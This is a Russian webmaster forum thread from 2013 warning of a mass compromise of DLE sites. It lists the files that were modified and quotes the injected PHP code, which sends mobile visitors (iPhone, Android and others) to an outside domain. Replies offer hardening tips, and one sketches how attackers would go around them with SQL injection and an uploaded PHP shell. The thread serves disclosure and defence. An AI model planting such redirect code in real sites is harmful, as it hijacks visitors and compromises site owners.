Массовый взлом DLE сайтов от 13.01.2013

Тема в разделе "Мегафлуд", создана пользователем -=ber$erk=-, 13 янв 2013.

  1. -=ber$erk=-

    -=ber$erk=-

    Регистр.:
    17 мар 2008
    Сообщения:
    237
    Симпатии:
    105
    Проверьте у себя и предупредите других!

    В настоящий момент имеется массовый взлом DLE сайтов.

    изменяются файлы
    файлы
    index.php
    engine/engine.php
    engine/init.php
    engine/data/config.php
    engine/data/dbconfig.php

    вставляют код

    $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
    $android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
    $palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
    $berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
    $ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

    if ($iphone || $android || $palmpre || $ipod || $berry === true) {
    header('Location: http://statuses.ws/');

    в одном файле может быть несколько раз

    про саму уязвимость ничего не известно, но возможно
    http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html
     
    lamer2, KhvMegaBait, o_nix и 2 другим нравится это.
  2. StrikeOFF

    StrikeOFF ♥kan inte lyfta utan lift♥

    Регистр.:
    20 мар 2010
    Сообщения:
    362
    Симпатии:
    200
    Чтобы было известно надо сомтреть логи. Чтобы не изменяли надо правильно выставлять права на свои файлы и директории.
     
  3. vladis1333

    vladis1333

    Регистр.:
    18 июл 2010
    Сообщения:
    588
    Симпатии:
    227
     
  4. efs

    efs SEO оптимизатор дискрипторов одностраничных сайтов

    Moderator
    Регистр.:
    20 ноя 2009
    Сообщения:
    826
    Симпатии:
    480
    не, у меня тоже гости побывали, но такая метода не подходит.
     
  5. -=ber$erk=-

    -=ber$erk=-

    Регистр.:
    17 мар 2008
    Сообщения:
    237
    Симпатии:
    105
    так вроде не первый год "замужем"
    права на запись правильные, только от владельца
    пароль только в голове
    хз каким образом "погостили"
    а логи читать на шт 50 сайтов на 4 серверах никакой жизни не хватит
     
  6. StrikeOFF

    StrikeOFF ♥kan inte lyfta utan lift♥

    Регистр.:
    20 мар 2010
    Сообщения:
    362
    Симпатии:
    200
    админка закрыта .htaccess ?
     
  7. puagardian

    puagardian One Love

    Moderator
    Регистр.:
    16 июл 2012
    Сообщения:
    433
    Симпатии:
    559
    Или может через расширение взломали?
     
  8. fumofuuu

    fumofuuu

    Регистр.:
    24 сен 2011
    Сообщения:
    279
    Симпатии:
    125
    все эти иньекцие которые помогают получить доступ к админке фигня, если использовать мой хак
    это как минимум даст вам время, чтобы залатать дырку и предотвратить остальные недочёты.
    не говоря уже о самом простом, (если вы на VDS) а это удалить нафиг phpmyadmin, закрыть все ненужные порты, и открыть порты только для своего IP адресса MySQL, SSH, и прочие. И каждый день заходить и прописывать yum update
     
  9. Горбушка

    Горбушка Ищу её...

    Регистр.:
    2 май 2008
    Сообщения:
    3.114
    Симпатии:
    2.130
    И нужно всего лишь загрузить через дырку PHP-шелл чтобы обойти твой мего-пупер-супер хак... Не говори ерунды, твой хак поможет разве что защитить от входа в админку сайта, а от SQL-инъекций он никак не защищает. Зачем нам получать вообще доступ в админку, если мы через ту же инъекцию можем слить полностью базу? А вторая дырка позволит нам залить шелл и делать всё что угодно с сайтом. Админка тут ни при чём. Читай матчасть по уязвимостям.
     
  10. mistik13

    mistik13 Писатель

    Регистр.:
    4 окт 2012
    Сообщения:
    0
    Симпатии:
    0
    ТС Скажи взломы произошли до патча или после ?